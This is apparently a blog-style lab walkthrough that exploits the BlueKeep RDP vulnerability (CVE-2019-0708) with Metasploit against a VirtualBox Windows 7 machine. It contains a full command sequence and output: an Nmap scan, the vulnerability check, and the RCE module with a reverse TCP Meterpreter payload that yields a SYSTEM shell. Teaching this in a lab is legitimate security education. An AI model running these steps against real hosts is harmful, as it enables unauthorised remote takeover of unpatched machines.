Description - What is bluekeep?
BlueKeep (CVE-2019-0708) is a security vulnerability that was discovered in Microsoft's Remote Desktop Protocol (RDP) implementation, which allows for the possibility of remote code execution.First reported in May 2019, it is present in all unpatched Windows NT-based versions of Microsoft Windows from Windows 2000 through Windows Server 2008 R2 and Windows 7. Microsoft issued a security patch (including an out-of-band update for several versions of Windows that have reached their end-of-life, such as Windows XP) on 14 May 2019. On 13 August 2019, related BlueKeep security vulnerabilities, collectively named DejaBlue, were reported to affect newer Windows versions, including Windows 7 and all recent versions up to Windows 10 of the operating system, as well as the older Windows versions. On 6 September 2019, a Metasploit exploit of the wormable BlueKeep security vulnerability was announced to have been released into the public realm.
Nmap Scan
We will firstly start the scan by running Nmap against our target machine
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS 10.0.2.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-17 12:09 EST
Nmap scan report for 10.0.2.15
Host is up (0.00011s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
MAC Address: 08:00:27:A5:43:C1 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 14.66 secondsAs we can see from our Nmap results, port `3389` is **open**, Next step is to see if this port is vulnerable.
Metasploit Scan
For this exploit we wil search for `bluekeep` and see if any exploits are available
┌──(kali㉿kali)-[~]
└─$ msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW||
||| |||
=[ metasploit v6.1.39-dev ]
+ -- --=[ 2214 exploits - 1171 auxiliary - 396 post ]
+ -- --=[ 616 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View advanced module options with
advanced
msf6 > search bluekeep
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
1 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf6 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) >What does this module do?
To find out what this module can do, we will run the command `show info` to find more information about it.
$ `msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show info`
#### Description:
> This module checks a range of hosts for the CVE-2019-0708
vulnerability by binding the MS_T120 channel outside of its normal
slot and sending non-DoS packets which respond differently on
patched and vulnerable hosts. It can optionally trigger the DoS
vulnerability.
Setting Options
Now that we know what this module does, next step is to see what options we have to set.
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show options
Module options (auxiliary/scanner/rdp/cve_2019_0708_bluekeep):
Name Current Setting Required Description
---- --------------- -------- -----------
RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME rdesktop no The client computer name to report during connect,
UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = rand
om
RHOSTS yes The target host(s), see https://github.com/rapid7/m
etasploit-framework/wiki/Using-Metasploit
RPORT 3389 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
Auxiliary action:
Name Description
---- -----------
Scan Scan for exploitable targetsAs shown above we now have our options, in this case we only need to focus on the `RHOSTS` option.
To set this option to our target machine we will use the `set` command
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set RHOSTS 10.0.2.15
RHOSTS => 10.0.2.15Now with out `RHOSTS` set we can finally move on to using the `run` command and find out if our targets machine is vulnerable or not.
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run
[+] 10.0.2.15:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 10.0.2.15:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedAmazing! Our targets machine is vulnerable. Next step is exploting that vulnerability.
Exploiting a vulnerability
As shown previously we will once again search bluekeep but instead of using the scanner, this time we will use `exploit/windows/rdp/cve_2019_0708_bluekeep_rce`.
Lets begin.
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcpSetting our options
We must now look and out options and set them.
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME ethdev no The client computer name to report during connect,
UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = rand
om
RHOSTS yes The target host(s), see https://github.com/rapid7/m
etasploit-framework/wiki/Using-Metasploit
RPORT 3389 yes The target port (TCP)
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic targeting via fingerprintingAs like before we are only forcused on the `RHOSTS` option. Like before we will set this by using the `set RHOSTS` command followed by our targets IP.
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS 10.0.2.15
RHOSTS => 10.0.2.15Setting your target
Setting your target is quite important, as for this example this exploit only targets 64 bit machines so it will not be able to run on a 32 bit machine.
Knowing this we can easily tell that windows 7 32 bit and windows servers 2008 would not be vulnerable to this exploit.
by default this exploit is for normal windows machines `Windows 7 SP1 / 2008 R2 (6.1.7601 x64)`. To change this we must run `show targets` to get a list of targets that we can choose from.
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
5 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
6 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
7 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
8 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)In my case I will set my target to 2/`Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)`.
To do this I will simple type :
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
target => 2Great, now that our target is set we move onto our finally stage.
Finally Stage - The Exploit
Now that we know our targets machine is vulnerable to bluekeep and we have all of our options set, the next and final step is to see if we can successfully gain access.
To do this we will run the `exploit` command and see if we can succesfully gain access to the targets machine.
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Started reverse TCP handler on 10.0.2.5:4444
[*] 10.0.2.15:3389 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.0.2.15:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 10.0.2.15:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 10.0.2.15:3389 - Scanned 1 of 1 hosts (100% complete)
[+] 10.0.2.15:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 10.0.2.15:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[!] 10.0.2.15:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.0.2.15:3389 - Surfing channels ...
[*] 10.0.2.15:3389 - Lobbing eggs ...
[*] 10.0.2.15:3389 - Forcing the USE of FREE'd object ...
[!] 10.0.2.15:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*} Sending stage (201283 bytes) to 10.0.2.15
[*] Meterpreter session 1 opened (10.0.2.5:444 -> 10.0.2.15:49161) at 2022-12-17 05:07:02 - 0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreterAs shown above we have successfully gained access into the machine using the Bluekeep exploit.
To find out more information about Blue keep click [here](https://en.wikipedia.org/wiki/BlueKeep)
Comments